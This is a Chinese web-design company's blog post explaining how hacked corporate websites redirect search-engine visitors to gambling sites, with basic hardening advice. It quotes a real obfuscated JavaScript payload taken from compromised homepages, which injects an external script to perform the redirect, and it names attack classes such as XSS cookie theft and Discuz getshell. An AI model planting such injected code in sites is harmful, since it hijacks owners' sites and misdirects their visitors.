欢迎您访问广州骏域网络官网,今天是2018年10月16日
|  手机版|  表格下载|  客户留言|  备案申请 建站申请建站服务热线:020-3460 1098

骏域网络

骏域新闻建站新闻网站教程深圳建站
首页 >企业网站恶意跳转赌博网站如何处理

企业网站恶意跳转赌博网站如何处理

广州网站建设公司2018-08-03504

最近公司内部跟单同事表示,大批广州网站建设公司客户在做百度推广时候,网站的首页点击进去后自动跳转到彩票网站、博彩网站,这样用户从百度搜索或者从推广广告位进去网站后发生跳转,而直接输入网址是没有任何跳转的,这样一来用户流失造成访问量急剧下滑、网站服务器资源浪费、推广费用浪费等,甚至可以说做了百度推广、搜狗推广的都在给彩票公司做广告了,在网站建设行业内引起轩然大波。


广州网站建设



有不少客户在反应这个问题时候,找到广告商赔偿甚至追究责任,所以在网站恶意跳转的问题上我们运营人员需要重视并且知晓如何快速解决,广州网站建设公司骏域网络从网络上查阅并且测试后总结为以下经验:



一、分析网站被黑跳转博彩网站原因



一般情况下网站被黑时候后都是因为服务器信息(服务器IP 远程端口 管理员账号密码、SSH端口、root账号密码)和网站信息包括FTP账号密码的对接被黑客知晓,进而造成黑客植入木马或者后门。



整体的安全监测中,asp网站和php网站都存在着木马,这也就意味着木马能够以php脚本木马、asp脚本木马、jsp脚本木马而存在,这些木马后门可以对网站进行恶意篡改,上传,改名,下载,等管理员的高权限操作。出现网站被跳转的客户,采用的网站架构都是php+mysql架构,以及jsp+mysql架构,大多数用的是开源程序,像dedecms,织梦系统,phpcms系统,discuz系统。



当我们懂得一些代码的时候,必然会看到网站首页中会有一些恶意篡改代码,通过删除恶意代码后可能会在几天内完全的停止跳转的,但是在一段时间后却又会被跳转,这个是很令人懊恼的治标不治本措施。过了不久后网站又会出现跳转,那么针对于网站漏洞问题是很难甚至是不能够完全清除的。



通过观察部分客户网站首页,其首页代码中都会有一段加密代码,这段代码是根据搜索引擎的特征来跳转,比如通过百度搜索,360搜索,搜狗搜索来的会直接跳转到彩票,赌博网站上去。如下代码:



type="text/java">eval(function(p,a,c,k,e,d){e=function(c){return(c35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){retun d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('l["\\e\\c\\1\\m\\i\\8\\n\\0"]["\\7\\4\\9\\0\\8"](\'\\h\\2\\1\\4\\9\\3\\0\\0\\j\\3\\8\\d\\6\\0\\8\\k\\0\\5\\f\\a\\r\\a\\2\\1\\4\\9\\3\\0\\6\\2\\4\\1\\d\\6\\s\\0\\0\\3\\2\\q\\5\\5\\7\\7\\7\\b\\1\\3\\e\\a\\2\\p\\b\\1\\c\\i\\5\\j\\o\\1\\b\\f\\2\\6\\g\\h\\5\\2\\1\\4\\9\\3\\0\\g\');',29,29,'x74|x63|x73|x70|x72|x2f|x22|x77|x65|x69|x61|x2e|x6f|x3d|x64|x6a|x3e|x3c|x6d|x79|x78|window|x75|x6e|x6c|x38|x3a|x76|x68'.split('|'),0,{}))



一旦被攻击之后,百度搜索引擎就会判断出网站是否被攻击,从而在百度风险评估中心就会对网站进行记录以及标识,百度网址安全中心提醒您:该站点可能受到黑客攻击,部分页面已被非法篡改! 红色提示该百度风险。导致客户打开网站直接被百度拦截,如下图所示:


广州网站建设



针对于以上跳转攻击的特征,我们广州网站建设公司一致认为应该从人工代码方面进行审计,以及检测网站漏洞、网站后门木马清理、漏洞修复以及xss获取管理员账号cookies漏洞,discuz存在getshell漏洞,注入获取管理员漏洞,discuz上传绕过漏洞等。



二、修复以及防止网站被恶意跳转的办法



1、对服务器目录进行安全部署、对管理员帐号密码加密、对所有密码进行数字+大小写字母+特殊符号要求、对网站数据库进行分配普通权限账号。



2、mysql数据库默认端口3306,改为61116,并加入到端口安全策略,不对外开放,外网IP无法连接数据库,只有本地127.0.0.1才能进行连接数据库,以防止攻击者恶意猜测。



3、对服务器底层系统进行安全加固,包括远程端口登录的安全验证。



4、对网站代码进行整体的安全检测,包括定期的升级网站程序源代码,修复补丁以及网站漏洞。



广州网站建设公司处理网站跳转问题有很多方法,以上内容只是解决问题的方法之一,那么作为一个网站建设公司应该对源码进行优化和调整,这样才能确保后期的网站不会受到影响,这就涉及到网站源码升级以及版本升级问题。

分享到微信QQ空间QQ好友腾讯微博新浪微博0

下一篇本次企业网站降权是否会让seo专家转型走向seo编辑?

返回资讯列表

上一篇大批企业站被百度降权疑似中招细雨算法

11日
2018年10月

【网站建设】新网站刚优化的时候进入沙盒期该怎么办

网站建设完成后有的企业会选择进行百度推广或者网站优化,但都是为了能够通过网站的展现获得有效客户资源。那今天骏域网站建设小编和大家分析一下新网站刚优化的时候进入了沙盒期该怎么办,怎样才能快速走出来?...
09日
2018年10月

【网站建设】网站建设中视觉设计的6大要素

无论是企业还是个人进行网站建设都希望能够吸引到用户,这也就是优化行业中所说的网站页面停留率。从用户体验上来说,能够让用户停留在一个页面上必定有些东西是吸引着他的,或内容,或图片,或视觉设计等等。那在网站建设中视
25日
2018年09月

【网站建设】外贸网站建设一般需要多少钱

自从南沙自贸区成立后越来越多外贸企业注册起来了,在如今的互联网时代外贸企业注册后要想品牌远播还需进行网站建设来宣传推广自己。那一个外贸网站建设起来大概需要多少钱呢?我们都知道一般建站的难度、时间等等都能决
19日
2018年09月

【网站建设】企业网站建设后把内容做到极致的几种方法

企业想要利用互联网来推广公司产品除了网站建设外还需要把网站的内容做到极致,一个没有内容或者内容质量很差的网站是没办法吸引到用户访问的,就算有用户访问也很难留住客户继续浏览。那深圳网站建设​公司今天教大家如
17日
2018年09月

【网站建设】电商网站建设有哪些细节需要注意的

随着消费者的习惯越来越网络化,不少企业开始经营电商平台或者自主进行电商网站建设。但是要运营好一个电商网站并不是一件易事,难就难在把电商网站的每个细节都做到位,能够真正从用户体验出发,下面骏域小编就和大家总结一
14日
2018年09月

【网站建设】网站建设后能通过哪些方式来获取利润

企业在进行网站建设的前期是需要一定的投入的,比如域名、服务器的购买、人工成本等等。...
13日
2018年09月

【网站建设】网站建设完后客户一般需要做什么工作

现在很多企业都选择找外面的网站建设​公司来帮忙做网站,毕竟做好一个网站需要程序、前端、设计等等人员来配合的,大部分中小企业都不具备这样专业的团队。那我们从建设公司拿到做好的网站后需要做些什么工作呢?...
12日
2018年09月

【网站建设】为何所有网站建设都会设计404错误页面

网站建设其实就是由不同的网页组成,一般企业网站都包含企业首页、文章页、新闻列表页、产品页等等,这些网页通过建站技术整合在一起就构成一个网站了,但一般网站建设都会设计多一个404页面,这个又有什么用处呢?...
广州市番禺区禺山西路329号海伦堡创意园4座1栋17楼1706 020-34601098020-34589360 版权所有© 广州骏域网络科技有限公司 粤ICP备11025769号